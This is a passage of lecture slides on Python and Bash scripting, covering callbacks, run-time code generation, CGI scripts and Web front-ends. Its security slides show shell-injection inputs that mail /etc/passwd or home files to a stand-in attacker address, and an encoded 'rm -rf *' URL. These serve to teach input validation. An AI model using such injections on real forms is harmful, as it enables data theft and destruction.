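        self.kw = kw       # keyword arguments stored at construction time

    def __call__(self, *args, **kw):
        # call-time arguments (e.g. the event) come first,
        # then the stored arguments
        args = args + self.args
        kw.update(self.kw)
        return self.func(*args, **kw)

def configure(event, tag, bg):
    """Hypothetical callback: just report what it received."""
    return 'event=%s tag=%s bg=%s' % (event, tag, bg)

c = Command(configure, 'tag1', 'blue')
result = c('<Enter>')   # Tk would pass an event object here
```

    Note the argument order: functools.partial in the standard library places its stored arguments before the call-time arguments, so it is not a drop-in replacement when the event must be the first argument.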
    



    Using the Command class

    from py4cs.misc import Command
    self.hwtext.tag_bind('tag1','<Enter>',
        Command(self.configure, 'tag1', 'blue'))
    
    def configure(self, event, tag, bg):
        self.hwtext.tag_configure(tag, background=bg)
    
    ###### compare this with the lambda version:
    
    self.hwtext.tag_bind('tag1','<Enter>',
        lambda event=None, x=self.hwtext:
        x.tag_configure('tag1',background='blue'))
    



    Generating code at run time (1)

    Construct Python code in a string:
    def genfunc(self, tag, bg, optional_code=''):
        funcname = 'temp'
        code = "def %(funcname)s(self, event=None):\n"\
               "    self.hwtext.tag_configure("\
               "'%(tag)s', background='%(bg)s')\n"\
               "    %(optional_code)s\n" % vars()
    
    Execute this code (i.e. define the function!)
        exec code in vars()
    
    Return the defined function object:
        # funcname is a string, 
        # eval() turns it into func obj:
        return eval(funcname)
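
    The exec statement above is Python 2 syntax. A minimal sketch of the same idea in Python 3, where exec is a function and the generated function is fetched from an explicit namespace dictionary. The settings dictionary is a hypothetical stand-in for the text widget:

```python
def genfunc(tag, bg):
    """Build a function from source code in a string and return it."""
    funcname = 'temp'
    code = ("def %(funcname)s(settings, event=None):\n"
            "    settings[%(tag)r] = %(bg)r\n" % vars())
    namespace = {}
    exec(code, namespace)        # defines the function inside namespace
    return namespace[funcname]   # look up the function object by name

settings = {}
enter = genfunc('tag2', 'red')
enter(settings)                  # simulate the event
```

    Code strings should only be built from trusted input, since exec runs whatever the string contains.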
    



    Generating code at run time (2)

    Example on calling code:
    self.tag2_leave = self.genfunc('tag2', 'white')
    self.hwtext.tag_bind('tag2', '<Leave>', self.tag2_leave)
    
    self.tag2_enter = self.genfunc('tag2', 'red',
        # add a string containing optional Python code:
        r"i=...self.hwtext.insert(i,'You have hit me "\
        "%d times' % ...")
            
    self.hwtext.tag_bind('tag2', '<Enter>', self.tag2_enter)
    
    Flexible alternative to lambda functions!



    Fancy list (1)

    Usage:
    root = Tkinter.Tk()
    Pmw.initialise(root)
    root.title('GUI for Script II')
    
    list = [('exercise 1',  'easy stuff'),
            ('exercise 2',  'not so easy'),
            ('exercise 3',  'difficult')
                ]
    widget = Fancylist(root,list)
    root.mainloop()
    
    When the mouse is over a list item, the background color changes and the help text appears in a label below the list



    Fancy list (2)

    import Tkinter, Pmw
    
    class Fancylist:
      def __init__(self, parent, list, 
                   list_width=20, list_height=10):
        self.frame = Tkinter.Frame(parent, borderwidth=3)
        self.frame.pack()
            
        self.listbox = Pmw.ScrolledText(self.frame,
            vscrollmode='dynamic', hscrollmode='dynamic',
            labelpos='n', 
            label_text='list of chosen curves',
            text_width=list_width, text_height=list_height,
            text_wrap='none',  # do not break too long lines
        )
        self.listbox.pack(pady=10)
    
        self.helplabel = Tkinter.Label(self.frame, width=60)
        self.helplabel.pack(side='bottom',fill='x',expand=1)
    



    Fancy list (3)

    # Run through the list, define a tag,
    # bind a lambda function to the tag:
    
    counter = 0
    for (item, help) in list:
      tag = 'tag' + str(counter) # unique tag name
      self.listbox.insert('end', item + '\n', tag)
    
      self.listbox.tag_bind(tag, '<Enter>',
           lambda event, f=self.configure, t=tag, 
                  bg='blue', text=help:
           f(event, t, bg, text))
    
      self.listbox.tag_bind(tag, '<Leave>',
           lambda event, f=self.configure, t=tag, 
                  bg='white', text='':
           f(event, t, bg, text))
    
      counter = counter + 1
    # make the text buffer read-only:
    self.listbox.configure(text_state='disabled')
    
    def configure(self, event, tag, bg, text):
      self.listbox.tag_configure(tag, background=bg)
      self.helplabel.configure(text=text)
    



    Class implementation of simviz1.py

    Recall the simviz1.py script for running a simulation program and visualizing the results
    simviz1.py was a straight script, even without functions
    As an example, let's make a class implementation
    class SimViz:
        def __init__(self):
            self.initialize()
        
        def initialize(self):
            ...
    
        def process_command_line_args(self, cmlargs):
            ...
    
        def simulate(self):
            ...
    
        def visualize(self):
            ...
    



    Dictionary for the problem's parameters

    simviz1.py had problem-dependent variables like m, b, func, etc.
    In a complicated application, there can be a large number of such parameters, so let's automate
    Store all parameters in a dictionary:
    self.p['m'] = 1.0
    self.p['func'] = 'y'
    
    etc.
    The initialize function sets default values to all parameters in self.p



    Parsing command-line options

    def process_command_line_args(self, cmlargs):
        """Load data from the command line into self.p."""
        opt_spec = [ x+'=' for x in self.p.keys() ]
        try:
            options, args = getopt.getopt(cmlargs,'',opt_spec)
    
        except getopt.GetoptError:
            <handle illegal options>
    
        for opt, val in options:
            key = opt[2:] # drop prefix --
            if   isinstance(self.p[key], float):  val = float(val)
            elif isinstance(self.p[key], int):    val = int(val)
            self.p[key] = val  
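
    A self-contained sketch of the same technique in Python 3 syntax, written as a plain function instead of a method. The parameter names and the command line are made-up examples:

```python
import getopt

def parse_options(defaults, cmlargs):
    """Return a copy of defaults updated with --name value pairs."""
    p = dict(defaults)
    opt_spec = [name + '=' for name in p]   # 'm=' means: --m takes a value
    options, args = getopt.getopt(cmlargs, '', opt_spec)
    for opt, val in options:
        key = opt[2:]                       # drop prefix --
        # convert the string to the type of the default value:
        p[key] = type(defaults[key])(val)
    return p

p = parse_options({'m': 1.0, 'n': 10, 'func': 'y'},
                  ['--m', '2.5', '--n', '20', '--func', 'siny'])
```

    The conversion via the type of the default value works for floats, ints and strings; other types would need special handling.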
    



    Simulate and visualize functions

    These are straight translations from code segments in simviz1.py
    Remember: m is replaced by self.p['m'], func by self.p['func'] and so on
    Variable interpolation,
    s = 'm=%(m)g ...' % vars()
    
    does not work with
    s = 'm=%(self.p['m'])g ...' % vars()
    
    so we must use a standard printf construction:
    s = 'm=%g ...' % (self.p['m'], ...)
    
    or (better)
    s = 'm=%(m)g ...' % self.p
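
    A small sketch of dictionary-based interpolation, with a made-up parameter dictionary p. The last two lines use Python 3 formatting alternatives:

```python
p = {'m': 1.0, 'b': 0.7, 'func': 'y'}

# the keys of the dictionary are used as names in the format string:
s_percent = 'm=%(m)g b=%(b)g func=%(func)s' % p

# equivalent formulations in Python 3:
s_format = 'm={m:g} b={b:g} func={func}'.format(**p)
s_fstring = f"m={p['m']:g} b={p['b']:g} func={p['func']}"
```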
    



    Usage of the class

    A little main program is needed to steer the actions in class SimViz:
    adm = SimViz()
    adm.process_command_line_args(sys.argv[1:])
    adm.simulate()
    adm.visualize()
    
    See src/examples/simviz1c.py



    A class for holding a parameter (1)

    Previous example: self.p['m'] holds the value of a parameter
    There is more information associated with a parameter:

    the value
    the name of the parameter
    the type of the parameter (float, int, string, ...)
    input handling (command-line arg., widget type etc.)
    Idea: Use a class to hold parameter information



    A class for holding a parameter (2)

    Class declaration:
    class InputPrm:
        """class for holding data about a parameter"""
        def __init__(self, name, default, 
                     type=float): # string to type conversion func.
            self.name = name
            self.v = default  # parameter value
            self.str2type = type
    
    Make a dictionary entry:
    self.p['m'] = InputPrm('m', 1.0, float)
    
    Convert from string value to the right type:
    self.p['m'].v = self.p['m'].str2type(value)
    



    From command line to parameters

    Interpret command-line arguments and store the right values (and types!) in the parameter dictionary:
    def process_command_line_args(self, cmlargs):
        """load data from the command line into variables"""
        opt_spec = map(lambda x: x+"=", self.p.keys())
        try:
            options, args = getopt.getopt(cmlargs,"",opt_spec)
        except getopt.GetoptError:
            ...
        for option, value in options:
            key = option[2:]
            self.p[key].v = self.p[key].str2type(value)
    
    This handles any number of parameters and command-line arguments!



    Explanation of the lambda function

    Example on a very compact Python statement:
    opt_spec = map(lambda x: x+"=", self.p.keys())
    
    Purpose: create option specifications for getopt; an option --opt followed by a value is specified as 'opt='
    All the options have the same name as the keys in self.p
    Dissection:
    def add_equal(s): return s+'='  # add '=' to a string
    # apply add_equal to all items in a list and return the
    # new list:
    opt_spec = map(add_equal, self.p.keys())
    
    or written out:
    opt_spec = []
    for key in self.p.keys():
        opt_spec.append(add_equal(key))
    



    Printing issues

    A nice feature of Python is that
    print self.p
    
    usually gives a nice printout of the object, regardless of the object's type
    Let's try to print a dictionary of user-defined data types:
    {'A': <__main__.InputPrm instance at 0x8145214>, 
     'case': <__main__.InputPrm instance at 0x81455ac>, 
     'c': <__main__.InputPrm instance at 0x81450a4>
      ...
    
    Python does not know how to print our InputPrm objects
    We can tell Python how to do it!



    Tailored printing of a class' contents

    print a means 'convert a to a string and print it'
    The conversion to string of a class can be specified in the functions __str__ and __repr__:
    str(a)  means calling a.__str__()
    repr(a) means calling a.__repr__()
    
    __str__: compact string output
    __repr__: complete class content
    print self.p (or str(self.p) or repr(self.p)), where self.p is a dictionary of InputPrm objects, will try to call the __repr__ function in InputPrm for getting the 'value' of the InputPrm object
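
    A minimal sketch (Python 3 syntax) of which method is used where. The class Prm is a made-up example:

```python
class Prm:
    def __init__(self, v):
        self.v = v

    def __str__(self):
        return 'str:%s' % self.v

    def __repr__(self):
        return 'repr:%s' % self.v

a = Prm(5)
single = str(a)              # uses Prm.__str__
inside_dict = str({'A': a})  # the dictionary uses Prm.__repr__ for its items
```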



    From class InputPrm to a string

    Here is a possible implementation:
    class InputPrm:
        ...
        def __repr__(self):
            return str(self.v) + ' ' + str(self.str2type)
    
    Printing self.p yields
    {'A': 5.0 <type 'float'>, 
     'case': tmp1 <type 'str'>, 
     'c': 5.0 <type 'float'>
     ...
    



    A smarter string representation

    Good idea: write the string representation with the syntax needed to recreate the instance:
    def __repr__(self):
        # str(self.str2type) is <type 'type'>, extract 'type':
        m = re.search(r"<type '(.*)'>", str(self.str2type))
        if m:
            return "InputPrm('%s',%s,%s)" % \
                   (self.name, self.__str__(), m.group(1))
    
    def __str__(self):
        """compact output"""
        value = str(self.v)  # ok for strings and ints
        if self.str2type == float:
            value = "%g" % self.v  # compact float representation
        elif self.str2type == int:
            value = "%d" % self.v  # compact int representation
        elif self.str2type == str:
            value = "'%s'" % self.v  # string representation
        else:
            value = "'%s'" % str(self.v)
        return value
    



    Eval and str are now inverse operations

    Write self.p to file:
    f = open(somefile, 'w')
    f.write(str(self.p))
    
    File contents:
    {'A': InputPrm('A',5,float), ...
    
    Loading the contents back into a dictionary:
    f = open(somefile, 'r')
    q = eval(f.readline())
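
    A sketch of the round trip in Python 3 syntax, without the file. In Python 3, str(float) gives "<class 'float'>", so the regular expression used earlier would not match; this sketch takes the type name from the __name__ attribute instead, which is an assumption that only holds for built-in types like float, int and str:

```python
class InputPrm:
    """Class for holding data about a parameter."""
    def __init__(self, name, default, type=float):
        self.name = name
        self.v = default
        self.str2type = type

    def __repr__(self):
        # write the syntax needed to recreate the instance:
        return 'InputPrm(%r, %r, %s)' % \
               (self.name, self.v, self.str2type.__name__)

p = {'A': InputPrm('A', 5.0, float),
     'case': InputPrm('case', 'tmp1', str)}
text = repr(p)   # what would be written to file
q = eval(text)   # what would be read back
```

    eval executes arbitrary code, so this is only suitable for files you have written yourself.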
    





    Simple CGI programming in Python




    Interactive Web pages

    Topic: interactive Web pages
    (or: GUI on the Web)
    Methods:

    Java applets (downloaded)
    JavaScript code (downloaded)
    CGI script on the server
    Perl and Python are very popular for CGI programming



    Scientific Hello World on the Web

    Web version of the Scientific Hello World GUI
    HTML allows GUI elements (FORM)
    Here: text ('Hello, World!'), text entry (for r) and a button 'equals' for computing the sine of r
    HTML code:
    <HTML><BODY BGCOLOR="white">
    <FORM ACTION="hw1.py.cgi" METHOD="POST">
    Hello, World! The sine of 
    <INPUT TYPE="text" NAME="r" SIZE="10" VALUE="1.2">
    <INPUT TYPE="submit" VALUE="equals" NAME="equalsbutton">
    </FORM></BODY></HTML>
    



    GUI elements in HTML forms

    Widget type: INPUT TYPE
    Variable holding input: NAME
    Default value: VALUE
    Widgets: one-line text entry, multi-line text area, option list, scrollable list, button



    The very basics of a CGI script

    Pressing "equals" (i.e. submit button) calls a script hw1.py.cgi
    <FORM ACTION="hw1.py.cgi" METHOD="POST">
    
    Form variables are packed into a string and sent to the program
    Python has a cgi module that makes it very easy to extract variables from forms
    import cgi
    form = cgi.FieldStorage()
    r = form.getvalue("r")
    
    Grab r, compute sin(r), write an HTML page with (say)
    Hello, World! The sine of 2.4 equals 0.675463180551
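
    How the packed string is decoded can be sketched with the standard library alone. This Python 3 example uses urllib.parse.parse_qs instead of the cgi module (which is no longer part of the standard library in the newest Python versions); the query string is a made-up example of what the form above would send:

```python
import math
from urllib.parse import parse_qs

query = 'r=2.4&equalsbutton=equals'   # form variables packed into a string
form = parse_qs(query)                # each name maps to a list of values
r = form['r'][0]

line = 'Hello, World! The sine of %s equals %.12g' % (r, math.sin(float(r)))
```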
    



    A CGI script in Python

    Tasks: get r, compute the sine, write the result on a new Web page
    #!/store/bin/python
    import cgi, math
    
    # required opening of all CGI scripts with output:
    print "Content-type: text/html\n"
    
    # extract the value of the variable "r":
    form = cgi.FieldStorage()
    r = form.getvalue("r")
    
    s = str(math.sin(float(r)))
    # print answer (very primitive HTML code):
    print "Hello, World! The sine of %s equals %s" % (r,s)
    



    Remarks

    A CGI script is run by a nobody or www user
    A header like
    #!/usr/bin/env python
    
    relies on finding the first python program in the PATH variable, and a nobody has a PATH variable out of our control
    Hence, we need to specify the interpreter explicitly:
    #!/store/bin/python
    
    Old Python versions do not support form.getvalue, use instead
    r = form["r"].value
    



    An improved CGI script

    Last example: HTML page + CGI script; the result of sin(r) was written on a new Web page
    Next example: just a CGI script
    The user stays within the same dynamic page, a la the Scientific Hello World GUI
    Tasks: extract r, compute sin(r), write HTML form
    The CGI script calls itself



    The complete improved CGI script

    #!/store/bin/python
    import cgi, math
    print "Content-type: text/html\n" # std opening
    
    # extract the value of the variable "r":
    form = cgi.FieldStorage()
    r = form.getvalue('r')
    if r is not None:
        s = str(math.sin(float(r)))
    else:
        s = ''; r = ''
    
    # print complete form with value:
    print """
    <HTML><BODY BGCOLOR="white">
    <FORM ACTION="hw2.py.cgi" METHOD="POST">
    Hello, World! The sine of 
    <INPUT TYPE="text" NAME="r" SIZE="10" VALUE="%s">
    <INPUT TYPE="submit" VALUE="equals" NAME="equalsbutton">
    %s </FORM></BODY></HTML>\n""" % (r,s)
    



    Debugging CGI scripts

    What happens if the CGI script contains an error?
    Browser just responds "Internal Server Error" -- a nightmare
    Start your Python CGI scripts with
    import cgitb; cgitb.enable()
    
    to turn on nice debugging facilities: Python errors now appear nicely formatted in the browser



    Debugging rule no. 1

    Always run the CGI script from the command line before trying it in a browser!
    unix> export QUERY_STRING="r=1.4"
    unix> ./hw2.py.cgi > tmp.html    # don't run python hw2.py.cgi!
    unix> cat tmp.html
    
    Load tmp.html into a browser and view the result
    Multiple form variables are set like this:
    QUERY_STRING="name=Some Body&phone=+47 22 85 50 50"
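
    A query string can also be generated from a dictionary, which takes care of characters with a special meaning. A sketch in Python 3 syntax, using the field values from the example above:

```python
from urllib.parse import urlencode, parse_qs

fields = {'name': 'Some Body', 'phone': '+47 22 85 50 50'}
query_string = urlencode(fields)   # suitable as value of QUERY_STRING
decoded = parse_qs(query_string)   # what the CGI script will see

# a literal + in a query string is decoded as a space:
raw = parse_qs('phone=+47 22 85 50 50')
```

    The last line shows why the encoding matters: without it, the leading plus sign of the phone number is lost.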
    



    Potential problems with CGI scripts

    Permissions you have as CGI script owner are usually different from the permissions of a nobody, e.g., file writing requires write permission for all users
    Environment variables (PATH, HOME etc.) are normally not available to a nobody
    Make sure the CGI script is in a directory where CGI scripts are allowed to be executed (some systems require CGI scripts to be in special cgi-bin directories)
    Check that the header contains the right path to the interpreter on the Web server
    Good check: log in as another user (you become a nobody!) and try your script



    Shell wrapper (1)

    Sometimes you need to control environment variables in CGI scripts
    Example: running your Python with shared libraries
    #!/usr/home/me/some/path/to/my/bin/python
    ...
    
    python requires shared libraries in directories
    specified by the environment variable LD_LIBRARY_PATH
    
    Solution: the CGI script is a shell script that sets up your environment prior to calling your real CGI script



    Shell wrapper (2)

    General Bourne Again shell script wrapper:
    #!/bin/bash
    # usage: www.some.net/url/wrapper-sh.cgi?s=myCGIscript.py
    
    # just set a minimum of environment variables:
    export scripting=~inf3330/www_docs/scripting
    export SYSDIR=/ifi/ganglot/k00/inf3330/www_docs/packages
    export BIN=$SYSDIR/`uname`
    export LD_LIBRARY_PATH=$BIN/lib:/usr/bin/X11/lib
    export PATH=$scripting/src/tools:/usr/bin:/bin:/store/bin:$BIN/bin
    export PYTHONPATH=$SYSDIR/src/python/tools:$scripting/src/tools
    
    # or set up my complete environment (may cause problems):
    # source /home/me/.bashrc
    
    # extract CGI script name from QUERY_STRING:
    script=`perl -e '$s=$ARGV[0]; $s =~ s/.*=//; \
            print $s' $QUERY_STRING`
    ./$script
    



    Security issues

    Suppose you ask for the user's email in a Web form
    Suppose the form is processed by this code:
    if "mailaddress" in form:  
        mailaddress = form.getvalue("mailaddress")
        note = "Thank you!"
        # send a mail:
        mail = os.popen("/usr/lib/sendmail " + mailaddress, 'w')
        mail.write("...")
        mail.close()
    
    What happens if somebody gives this "address":
    x; mail evilhacker@some.where < /etc/passwd
    
    ??



    Even worse things can happen...

    Another "address":
    x; tar cf - /home/hpl | mail evilhacker@some.where
    
    sends out all my files that anybody can read
    Perhaps my password or credit card number resides in one of these files?
    The evilhacker can also feed Mb/Gb of data into the system to load the server
    Rule: Do not copy form input blindly to system commands!
    Be careful with shell wrappers
    Recommendation: read the WWW Security FAQ



    Remedy

    Could test for bad characters like
             &;`'\"|*?~<>^()[]{}$\n\r
    
    Better: test for legal set of characters
    # expect text and numbers:
    if re.search(r'[^a-zA-Z0-9]', input):
       # stop processing
    
    Always be careful with launching shell commands;
    check for possible insecure side effects
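
    A sketch of both precautions in Python 3 syntax, applied to the mail example. The set of legal characters is an assumption made for this illustration, not a complete rule for valid mail addresses, and send_mail is a hypothetical helper:

```python
import re
import subprocess

def is_safe_address(address):
    """Accept only a restricted set of characters (a whitelist)."""
    pattern = r'[A-Za-z0-9][A-Za-z0-9._+-]*@[A-Za-z0-9.-]+'
    return re.fullmatch(pattern, address) is not None

def send_mail(address, body):
    """Hypothetical helper: run sendmail without involving a shell."""
    if not is_safe_address(address):
        raise ValueError('suspicious mail address: %r' % address)
    # with an argument list and no shell, characters like ; < | are
    # passed on as plain text and never interpreted as shell syntax
    subprocess.run(['/usr/lib/sendmail', address],
                   input=body.encode(), check=True)

ok = is_safe_address('hpl@some.where')
bad = is_safe_address('x; mail evilhacker@some.where < /etc/passwd')
```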



    Warning about the shell wrapper

    The shell wrapper script allows execution of a user-given command
    The command is intended to be the name of a secure CGI script, but the command can be misused
    Fortunately, the command is prefixed by ./
    ./$script
    
    so trying an rm -rf *,
    http://www.some.where/wrapper.sh.cgi?s="rm+-rf+%2A"
    
    does not work (./rm -rf *; ./rm is not found)

    The encoding of rm -rf * is carried out by
    >>> urllib.urlencode({'s':'rm -rf *'})
    's=rm+-rf+%2A'
    



    Web interface to the oscillator code



    Handling many form parameters

    The simviz1.py script has many input parameters, resulting in many form fields
    We can write a small utility class for

    holding the input parameters (either default values or user-given values in the form)
    writing form elements



    Class FormParameters (1)

    class FormParameters:
        "Easy handling of a set of form parameters"
    
        def __init__(self, form):
            self.form = form     # a cgi.FieldStorage() object
            self.parameter = {}  # contains all parameters
    
        def set(self, name, default_value=None):
            "register a new parameter"
            self.parameter[name] = default_value
    
        def get(self, name):
            """Return the value of the form parameter name."""
            if name in self.form:
                self.parameter[name] = self.form.getvalue(name)
            if name in self.parameter:
                return self.parameter[name]
            else:
                return "No variable with name '%s'" % name
    



    Class FormParameters (2)

        def tablerow(self, name):
            "print a form entry in a table row"
            print """
            <TR>
            <TD>%s</TD>
            <TD><INPUT TYPE="text" NAME="%s" SIZE=10 VALUE="%s"></TD>
            </TR>
            """ % (name, name, self.get(name))
    
        def tablerows(self):
            "print all parameters in a table of form text entries"
            print "<TABLE>"
            for name in self.parameter.keys():
                self.tablerow(name)
            print "</TABLE>"
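
    A testable sketch of the class in Python 3 syntax. Three things differ from the slides and are assumptions of this sketch: a plain dictionary stands in for the cgi.FieldStorage object, the methods return strings instead of printing, and values are passed through html.escape before they are written into the page:

```python
from html import escape

class FormParameters:
    "Easy handling of a set of form parameters"

    def __init__(self, form):
        self.form = form       # here: a dict with submitted values
        self.parameter = {}    # contains all parameters

    def set(self, name, default_value=None):
        "register a new parameter"
        self.parameter[name] = default_value

    def get(self, name):
        "return the submitted value if present, else the default"
        if name in self.form:
            self.parameter[name] = self.form[name]
        return self.parameter[name]

    def tablerow(self, name):
        "return a form entry in a table row"
        return ('<TR><TD>%s</TD><TD><INPUT TYPE="text" NAME="%s" '
                'SIZE=10 VALUE="%s"></TD></TR>'
                % (escape(name), escape(name), escape(str(self.get(name)))))

    def tablerows(self):
        "return all parameters in a table of form text entries"
        rows = [self.tablerow(name) for name in self.parameter]
        return '<TABLE>\n' + '\n'.join(rows) + '\n</TABLE>'

p = FormParameters({'m': '2.0'})   # the user has filled in m only
p.set('m', 1.0)
p.set('b', 0.7)
table = p.tablerows()
```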
    



    Class FormParameters (3)

    Usage:
    form = cgi.FieldStorage()
    p = FormParameters(form)
    p.set('m', 1.0)  # register 'm' with default val. 1.0
    p.set('b', 0.7)
    ...
    p.set('case', "tmp1")
    
    # start writing HTML:
    print """
    <HTML><BODY BGCOLOR="white">
    <TITLE>Oscillator code interface</TITLE>
    <IMG SRC="%s" ALIGN="left">
    <FORM ACTION="simviz1.py.cgi" METHOD="POST">
    ...
    """ % ...
    # define all form fields:
    p.tablerows()
    



    Important issues

    We need a complete path to the simviz1.py script
    simviz1.py calls oscillator so its directory must be in the PATH variable
    simviz1.py creates a directory and writes files, hence nobody must be allowed to do this
    Failing to meet these requirements typically gives an Internal Server Error...



    Safety checks

    # check that the simviz1.py script is available and
    # that we have write permissions in the current dir
    simviz_script = os.path.join(os.pardir,os.pardir,"intro",
                                 "python","simviz1.py")
    if not os.path.isfile(simviz_script):
        print "Cannot find <PRE>%s</PRE> "\
              "so it is impossible to perform simulations" % \
              simviz_script
    # make sure that simviz1.py finds the oscillator code, i.e.,
    # define absolute path to the oscillator code and add to PATH:
    osc = '/ifi/ganglot/k00/inf3330/www_docs/scripting/SunOS/bin'
    os.environ['PATH'] = ':'.join([os.environ['PATH'],osc])
    if not os.path.isfile(osc+'/oscillator'):
        print "The oscillator program was not found, "\
              "so it is impossible to perform simulations"
    if not os.access(os.curdir, os.W_OK):
        print "Current directory has not write permissions"\
              "so it is impossible to perform simulations"
    



    Run and visualize

    if form:                 # run simulator and create plot
        sys.argv[1:] = cmd.split()  # simulate command-line args...
        import simviz1       # run simviz1 as a script...
        os.chdir(os.pardir)  # compensate for simviz1.py's os.chdir
    
        case = p.get('case')
        os.chmod(case, 0777)  # make sure anyone can delete subdir
    
        # show PNG image:
        imgfile = os.path.join(case,case+'.png')
        if os.path.isfile(imgfile):
            # make an arbitrary new filename to prevent browsers
            # from reloading the image from a previous run:
            import random
            newimgfile = os.path.join(case,
                         'tmp_'+str(random.uniform(0,2000))+'.png')
            os.rename(imgfile, newimgfile)
            print """<IMG SRC="%s">""" % newimgfile
    print '</BODY></HTML>'
    



    The browser may show old plots

    'Smart' caching strategies may result in old plots being shown
    Remedy: make a random filename such that the name of the plot changes each time a simulation is run
    imgfile = os.path.join(case,case+".png")
    if os.path.isfile(imgfile):
        import random
        newimgfile = os.path.join(case,
                'tmp_'+str(random.uniform(0,2000))+'.png')
        os.rename(imgfile, newimgfile)
        print """<IMG SRC="%s">""" % newimgfile
    



    Using Web services from scripts

    We can automate the interaction with a dynamic Web page
    Consider hw2.py.cgi with one form field r
    Loading a URL augmented with the form parameter,
    http://www.some.where/cgi/hw2.py.cgi?r=0.1
    
    is the same as loading
    http://www.some.where/cgi/hw2.py.cgi
    
    and manually filling out the entry with '0.1'
    We can write a Hello World script that performs the sine computation on a Web server and extracts the value back to the local host



    Encoding of URLs

    Form fields and values can be placed in a dictionary and encoded correctly for use in a URL:
    >>> import urllib
    >>> p = {'p1':'some  string','p2': 1.0/3, 'q1': 'Ødegård'}
    >>> params = urllib.urlencode(p)
    >>> params
    'p2=0.333333333333&q1=%D8deg%E5rd&p1=some++string'
    
    >>> URL = 'http://www.some.where/cgi/somescript.cgi'
    >>> f = urllib.urlopen(URL + '?' + params)  # GET method
    >>> f = urllib.urlopen(URL, params)         # POST method
    



    The front-end code

    import urllib, sys, re
    r = float(sys.argv[1])
    params = urllib.urlencode({'r': r})
    URLroot = 'http://www.ifi.uio.no/~inf3330/scripting/src/py/cgi/'
    f = urllib.urlopen(URLroot + 'hw2.py.cgi?' + params)
    # grab s (=sin(r)) from the output HTML text:
    for line in f.readlines():
        m = re.search(r'"equalsbutton">(.*)$', line)
        if m:
            s = float(m.group(1)); break
    print 'Hello, World! sin(%g)=%g' % (r,s)
    



    Distributed simulation and visualization

    We can run our simviz1.py type of script such that the computations and generation of plots are performed on a server
    Our interaction with the computations is a front-end script to simviz1.py.cgi
    User interface of our script: same as simviz1.py
    Translate command-line args to a dictionary
    Encode the dictionary (form field names and values)
    Open an augmented URL (i.e. run computations)
    Retrieve plot files from the server
    Display plot on local host



    The code

    import math, urllib, sys, os, re
    
    # load command-line arguments into dictionary:
    p = {'case': 'tmp1', 'm': 1, 'b': 0.7, 'c': 5, 'func': 'y', 
         'A': 5, 'w': 2*math.pi, 'y0': 0.2, 'tstop': 30, 'dt': 0.05}
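    # options are given as -name value (same interface as simviz1.py):
    for i in range(1, len(sys.argv)-1):
        option = sys.argv[i]
        if option.startswith('-') and option[1:] in p:
            p[option[1:]] = sys.argv[i+1]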
    
    params = urllib.urlencode(p)
    URLroot = 'http://www.ifi.uio.no/~inf3330/scripting/src/py/cgi/'
    f = urllib.urlopen(URLroot + 'simviz1.py.cgi?' + params)
    
    # get PostScript file:
    file = p['case'] + '.ps'
    urllib.urlretrieve('%s%s/%s' % (URLroot,p['case'],file), file)
    
    # the PNG file has a random number; get the filename from
    # the output HTML file of the simviz1.py.cgi script:
    for line in f.readlines():
        m = re.search(r'IMG SRC="(.*)"', line)
        if m:
            file = m.group(1).strip(); break
    urllib.urlretrieve('%s%s/%s' % (URLroot,p['case'],file), file)
    os.system('display ' + file)
    





    Basic Bash programming




    Overview of Unix shells

    The original scripting languages were (extensions of) command interpreters in operating systems
    Primary example: Unix shells
    Bourne shell (sh) was the first major shell
    C and TC shell (csh and tcsh) had improved command interpreters, but were less popular than Bourne shell for programming
    Bourne Again shell (Bash/bash): GNU/FSF improvement of Bourne shell
    Other Bash-like shells: Korn shell (ksh), Z shell (zsh)
    Bash is the dominating Unix shell today



    Why learn Bash?

    Learning Bash means learning Unix
    Learning Bash means learning the roots of scripting
    (Bourne shell is a subset of Bash)
    Shell scripts, especially in Bourne shell and Bash, are frequently encountered on Unix systems
    Bash is widely available (open source) and the dominating command interpreter and scripting language on today's Unix systems
    Shell scripts are often used to glue more advanced scripts in Perl and Python



    More information

    Greg Wilson's excellent online course:
    http://www.swc.scipy.org
    man bash
    ``Introduction to and overview of Unix'' link in doc.html



    Scientific Hello World script

    Let's start with a script writing "Hello, World!"
    Scientific computing extension: compute the sine of a number as well
    The script (hw.sh) should be run like this:
    ./hw.sh 3.4
    
    or (less common):
    bash hw.sh 3.4
    
    Output:
    Hello, World! sin(3.4)=-0.255541102027
    



    Purpose of this script

    Demonstrate

    how to read a command-line argument
    how to call a math (sine) function
    how to work with variables
    how to print text and numbers



    Remark

    We use plain Bourne shell (/bin/sh) when special features of Bash (/bin/bash) are not needed
    Most of our examples can in fact be run under Bourne shell (and of course also Bash)
    Note that Bourne shell (/bin/sh) is usually just a link to Bash (/bin/bash) on Linux systems
    (Bourne shell is proprietary code, whereas Bash is open source)



    The code

    File hw.sh:
    #!/bin/sh
    r=$1  # store first command-line argument in r
    s=`echo "s($r)" | bc -l`
    
    # print to the screen:
    echo "Hello, World! sin($r)=$s"  
    



    Comments

    The first line specifies the interpreter of the script (here /bin/sh, could also have used /bin/bash)
    The command-line arguments are available as the script variables
    $1  $2  $3  $4 and so on
    
    Variables are initialized as
    r=$1
    
    while the value of r requires a dollar prefix:
    my_new_variable=$r  # copy r to my_new_variable
    



    Bash and math

    Bourne shell and Bash have very little built-in math; we therefore need to use bc, Perl or Awk to do the math
    s=`echo "s($r)" | bc -l`
    s=`perl -e '$s=sin($ARGV[0]); print $s;' $r`
    s=`awk "BEGIN { s=sin($r); print s;}"`
    # or shorter:
    s=`awk "BEGIN {print sin($r)}"`
    
    Back quotes mean executing the command inside the quotes and assigning the output to the variable on the left-hand side
    some_variable=`some Unix command`
    
    # alternative notation:
    some_variable=$(some Unix command)
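    A minimal sketch of command substitution in a complete script. The function name sine is hypothetical (it is not part of the course files), and awk is assumed to be installed. The number is handed to awk with the -v option instead of being pasted into the awk program text:

```shell
#!/bin/sh
# sine: hypothetical helper that prints sin(x) with 6 decimals
sine() {
    awk -v x="$1" 'BEGIN { printf "%.6f\n", sin(x) }'
}

r=3.4
s=$(sine "$r")     # $(...) captures what the command writes to standard output
echo "Hello, World! sin($r)=$s"
```

    The $(...) form can be nested without extra quoting, which is a practical reason to prefer it over back quotes.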
    



    The bc program

    bc = interactive calculator
    Documentation: man bc
    bc -l means bc with math library
    Note: sin is s, cos is c, exp is e
    echo sends a text to be interpreted by bc and bc responds with output (which we assign to s)
    variable=`echo "math expression" | bc -l`
    



    Printing

    The echo command is used for writing:
    echo "Hello, World! sin($r)=$s"
    
    and variables can be inserted in the text string
    (variable interpolation)
    Bash also has a printf function for format control:
    printf "Hello, World! sin(%g)=%12.5e\n" $r $s
    
